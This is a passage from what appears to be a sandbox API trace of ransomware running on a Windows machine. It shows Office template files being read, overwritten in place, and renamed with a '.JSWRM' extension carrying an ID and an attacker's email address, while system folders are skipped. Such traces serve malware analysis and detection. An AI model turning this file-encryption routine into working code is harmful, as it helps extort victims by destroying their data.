lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.451] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=259084) returned 1 [0140.451] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.451] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.462] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.462] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.463] CloseHandle (hObject=0x238) returned 1 [0140.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.464] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2183da4c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31ba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BIZCARD.XML", cAlternateFileName="")) returned 1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2=".") returned 1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="..") returned 1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="...") returned 1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="windows") returned -1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="recovery") returned -1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="perflogs") returned -1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="documents and settings") returned -1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="system volume information") returned -1 [0140.464] lstrcmpiW (lpString1="BIZCARD.XML", lpString2="msocache") returned -1 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZCARD.XML", lpUsedDefaultChar=0x0) returned 11 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZCARD.XML", lpUsedDefaultChar=0x0) returned 11 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.466] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12730) returned 1 [0140.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.466] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x31b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x31b0, lpOverlapped=0x0) returned 1 [0140.468] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.468] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x31b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x31b0, lpOverlapped=0x0) returned 1 [0140.469] CloseHandle (hObject=0x238) returned 1 [0140.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZCARD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizcard.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.473] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2183da4c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b7ebe, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BIZFORM.DPV", cAlternateFileName="")) returned 1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".") returned 1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="..") returned 1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="...") returned 1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="windows") returned -1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="recovery") returned -1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="perflogs") returned -1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="documents and settings") returned -1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="system volume information") returned -1 [0140.473] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="msocache") returned -1 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZFORM.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZFORM.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.474] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1801918) returned 1 [0140.474] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.474] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.487] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.487] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.488] CloseHandle (hObject=0x238) returned 1 [0140.488] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.489] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a46, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BIZFORM.XML", cAlternateFileName="")) returned 1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2=".") returned 1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="..") returned 1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="...") returned 1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="windows") returned -1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="recovery") returned -1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="perflogs") returned -1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="documents and settings") returned -1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="system volume information") returned -1 [0140.489] lstrcmpiW (lpString1="BIZFORM.XML", lpString2="msocache") returned -1 [0140.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZFORM.XML", lpUsedDefaultChar=0x0) returned 11 [0140.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZFORM.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZFORM.XML", lpUsedDefaultChar=0x0) returned 11 [0140.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.490] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68166) returned 1 [0140.490] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.491] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10a40, lpOverlapped=0x0) returned 1 [0140.496] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.496] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10a40, lpOverlapped=0x0) returned 1 [0140.497] CloseHandle (hObject=0x238) returned 1 [0140.497] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BIZFORM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bizform.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.498] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218b0166, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218b0166, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf0ec, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BORDERBB.DPV", cAlternateFileName="")) returned 1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".") returned 1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="..") returned 1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="...") returned 1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="windows") returned -1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="recovery") returned -1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="perflogs") returned -1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="documents and settings") returned -1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="system volume information") returned -1 [0140.498] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="msocache") returned -1 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDERBB.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDERBB.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BORDERBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.500] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=61676) returned 1 [0140.500] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.500] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf0e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xf0e0, lpOverlapped=0x0) returned 1 [0140.505] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.505] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf0e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xf0e0, lpOverlapped=0x0) returned 1 [0140.506] CloseHandle (hObject=0x238) returned 1 [0140.506] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BORDERBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BORDERBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.507] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218b0166, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218b0166, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e42, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BORDERBB.POC", cAlternateFileName="")) returned 1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2=".") returned 1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="..") returned 1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="...") returned 1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="windows") returned -1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="recovery") returned -1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="perflogs") returned -1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="documents and settings") returned -1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="system volume information") returned -1 [0140.507] lstrcmpiW (lpString1="BORDERBB.POC", lpString2="msocache") returned -1 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDERBB.POC", lpUsedDefaultChar=0x0) returned 12 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDERBB.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDERBB.POC", lpUsedDefaultChar=0x0) returned 12 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BORDERBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.522] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20034) returned 1 [0140.522] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.522] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4e40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4e40, lpOverlapped=0x0) returned 1 [0140.525] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.525] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4e40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4e40, lpOverlapped=0x0) returned 1 [0140.525] CloseHandle (hObject=0x238) returned 1 [0140.525] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 